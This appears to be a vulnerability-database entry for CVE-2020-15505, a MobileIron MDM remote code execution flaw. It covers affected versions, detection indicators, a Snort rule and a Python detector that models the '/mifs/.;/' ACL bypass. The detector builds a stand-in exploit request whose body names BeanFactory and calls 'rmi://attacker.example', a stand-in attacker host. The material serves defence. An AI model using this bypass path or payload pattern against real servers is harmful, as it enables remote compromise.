CVE-2020-15505
published 2020-07-07


Priority: P1 (97)
Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 99.74% (100.0th percentile)
A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.

Affected

13 ranges

Vendor      Product                          Version range             Fixed in
mobileiron  core                             < 10.3.0.4                10.3.0.4
mobileiron  core                             >= 10.4.0.0, < 10.4.0.4   10.4.0.4
mobileiron  core                             >= 10.5.1.0, < 10.5.1.1   10.5.1.1
mobileiron  core                             >= 10.5.2.0, < 10.5.2.1   10.5.2.1
mobileiron  core                             >= 10.6.0.0, < 10.6.0.1   10.6.0.1
mobileiron  enterprise_connector             < 10.3.0.4                10.3.0.4
mobileiron  enterprise_connector             >= 10.4.0.0, < 10.4.0.4   10.4.0.4
mobileiron  enterprise_connector             >= 10.5.1.0, < 10.5.1.1   10.5.1.1
mobileiron  enterprise_connector             >= 10.5.2.0, < 10.5.2.1   10.5.2.1
mobileiron  enterprise_connector             >= 10.6.0.0, < 10.6.0.1   10.6.0.1
mobileiron  monitor_and_reporting_database   < 2.0.0.2                 2.0.0.2
mobileiron  sentry                           >= 9.7.0, < 9.7.3         9.7.3
mobileiron  sentry                           >= 9.8.0, < 9.8.1         9.8.1

Detection & IOCs (extracted from sources)

path:  /mifs/.;/services/LogService
url:   https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
url:   https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
url:   https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10
bytes: 63 02 00 48 00 04 (hex: 630200480004)
snort/suricata rule (ET sid 2033606):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS Possible MobileIron MDM RCE Inbound (CVE-2020-15505)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/mifs/|2e 3b|/"; fast_pattern; content:"|63 02 00 48 00 84|"; startswith; content:"B|00|e|00|a|00|n|00|F|00|a|00|c|00|"; content:"r|00|m|00|i|00 3a 00 2f 00 2f|"; distance:0; reference:url,blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html; reference:cve,2020-15505; classtype:attempted-admin; sid:2033606; rev:1; metadata:created_at 2021_07_28, cve CVE_2020_15505, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_28;)
  • Exploit requests POST to the ACL-bypass path /mifs/.;/services/LogService with Content-Type: x-application/hessian. A Hessian header must be present; without it the server returns 403 or 500.
  • Successful exploitation responses carry the response header Content-Type: application/x-hessian with HTTP 200. Detect this combination on the /mifs/.;/ URI path.
  • The Snort/ET rule keys on the URI pattern /mifs/|2e 3b|/ (i.e., /mifs/.;/) combined with the Hessian call header |63 02 00 48 00 84| at the start of the POST body, plus the BeanFactory and rmi:// strings (matched with interleaved NUL bytes, i.e. UTF-16LE) in the payload. Note that the byte IOC listed above ends in 00 04 while the rule's content ends in 00 84; the two agree only on the first four bytes (63 02 00 48), so validate against a captured request before keying a detection on all six.
  • The Metasploit module exploits an ACL bypass to reach a Hessian-based Java deserialization endpoint and executes a Groovy gadget chain.
  • Affected versions span a wide range: the listed Core & Connector 10.3, 10.4, 10.5.1, 10.5.2 and 10.6.0 builds, Sentry ≤9.7.2 and 9.8.0, and RDB ≤2.0.0.1. Ensure version fingerprinting covers every listed sub-version (see the ranges and fixed builds in the Affected table) before concluding a host is patched.
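The following is an added example, not code from the original page, from MobileIron, or from the Orange Tsai write-up. It runs the indicators listed above over constructed sample HTTP requests, and models why the /mifs/.;/ path slips past a front-end ACL: the proxy compares the raw path, while Tomcat strips ';' path parameters and resolves '.' segments before routing, so the two sides see different URLs for one request. The host name, the stand-in Hessian body (only the header prefix is real; the rest is not a valid Hessian stream) and the proxy rule are assumptions made for the example.

```python
"""Added example: CVE-2020-15505 request-pattern detection plus a model of
the '/mifs/.;/' ACL bypass. Sample requests are constructed, not captured."""

# The page's byte IOC (...00 04) and the ET rule (...00 84) disagree on the
# sixth byte, so this match anchors on the four bytes both agree on: 'c' 02 00 'H'.
HESSIAN_CALL_PREFIX = b"c\x02\x00H"
BYPASS_MARKER = "/mifs/.;/"
PROTECTED_PREFIX = "/mifs/services/"


def tomcat_normalize(raw_path: str) -> str:
    """Simplified model of Tomcat's path normalisation: drop the query string,
    strip ';param' from every segment, collapse '.' and '..'. (Real Tomcat also
    percent-decodes; omitted here.)"""
    segments = []
    for seg in raw_path.split("?", 1)[0].split("/"):
        seg = seg.split(";", 1)[0]          # ';' starts a path parameter
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def front_end_acl_blocks(raw_path: str) -> bool:
    """Hypothetical proxy rule that deny-lists the service endpoints by comparing
    the *raw* path prefix; this is the shape of check the bypass defeats."""
    return raw_path.startswith(PROTECTED_PREFIX)


def acl_bypassed(raw_path: str) -> bool:
    """True when the proxy lets the request through but Tomcat still routes it
    to a protected endpoint."""
    return (not front_end_acl_blocks(raw_path)
            and tomcat_normalize(raw_path).startswith(PROTECTED_PREFIX))


def parse_request(raw: bytes):
    """Minimal HTTP/1.1 request parser -> (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def contains_string(body: bytes, s: str) -> bool:
    """The ET rule matches the strings with interleaved NULs (UTF-16LE);
    check that form as well as plain ASCII."""
    return s.encode() in body or s.encode("utf-16-le") in body


def match_cve_2020_15505(raw: bytes) -> dict:
    """Mirror of the page's indicators. 'alert' follows the ET rule (POST +
    bypass URI + Hessian header + BeanFactory + rmi://); individual indicators
    are returned so partial hits (e.g. a bare bypass probe) can still be logged."""
    method, target, headers, body = parse_request(raw)
    ind = {
        "post": method == "POST",
        "bypass_uri": BYPASS_MARKER in target,
        "hessian_content_type": "hessian" in headers.get("content-type", "").lower(),
        "hessian_call_header": body.startswith(HESSIAN_CALL_PREFIX),
        "beanfactory": contains_string(body, "BeanFactory"),
        "rmi_ref": contains_string(body, "rmi://"),
    }
    alert = all(ind[k] for k in ("post", "bypass_uri", "hessian_call_header",
                                 "beanfactory", "rmi_ref"))
    return {"indicators": ind, "alert": alert}


def build_request(method: str, target: str, content_type: str, body: bytes) -> bytes:
    """Assemble a request with a correct Content-Length (constructed input)."""
    head = f"{method} {target} HTTP/1.1\r\nHost: mdm.example.internal\r\n"
    if content_type:
        head += f"Content-Type: {content_type}\r\n"
    head += f"Content-Length: {len(body)}\r\n\r\n"
    return head.encode() + body


# Constructed stand-in for an exploit body: real header prefix, then the gadget
# strings the rule keys on. Not a valid Hessian stream.
EXPLOIT_BODY = (HESSIAN_CALL_PREFIX + b"\x00\x04"
                + "org.apache.naming.factory.BeanFactory".encode("utf-16-le")
                + "rmi://attacker.example/x".encode("utf-16-le") + b"z")

SAMPLE_EXPLOIT = build_request("POST", "/mifs/.;/services/LogService",
                               "x-application/hessian", EXPLOIT_BODY)
SAMPLE_PROBE = build_request("GET", "/mifs/.;/services/LogService", "", b"")
SAMPLE_BENIGN = build_request("POST", "/mifs/login.jsp",
                              "application/x-www-form-urlencoded", b"user=a")

if __name__ == "__main__":
    for name, req in (("exploit", SAMPLE_EXPLOIT), ("probe", SAMPLE_PROBE),
                      ("benign", SAMPLE_BENIGN)):
        _, target, _, _ = parse_request(req)
        r = match_cve_2020_15505(req)
        hits = [k for k, v in r["indicators"].items() if v]
        print(f"{name:8} acl_bypassed={acl_bypassed(target)} alert={r['alert']} hits={hits}")
```

The probe request produces no alert under the ET rule's logic but still sets the bypass_uri indicator; in practice that alone is worth logging, since no legitimate client sends the `.;` segment. The normalisation model is deliberately minimal, so treat it as an illustration of the mismatch rather than a faithful reimplementation of Tomcat.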

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck           9.8    CRITICAL
cisa                9.8    CRITICAL